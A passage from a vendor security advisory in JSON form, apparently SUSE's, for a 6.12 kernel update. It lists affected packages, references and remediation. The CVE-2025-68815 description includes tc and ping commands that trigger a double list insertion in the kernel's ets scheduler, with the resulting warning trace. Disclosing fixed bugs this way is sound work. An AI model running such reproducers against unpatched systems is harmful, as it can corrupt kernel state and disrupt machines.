"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
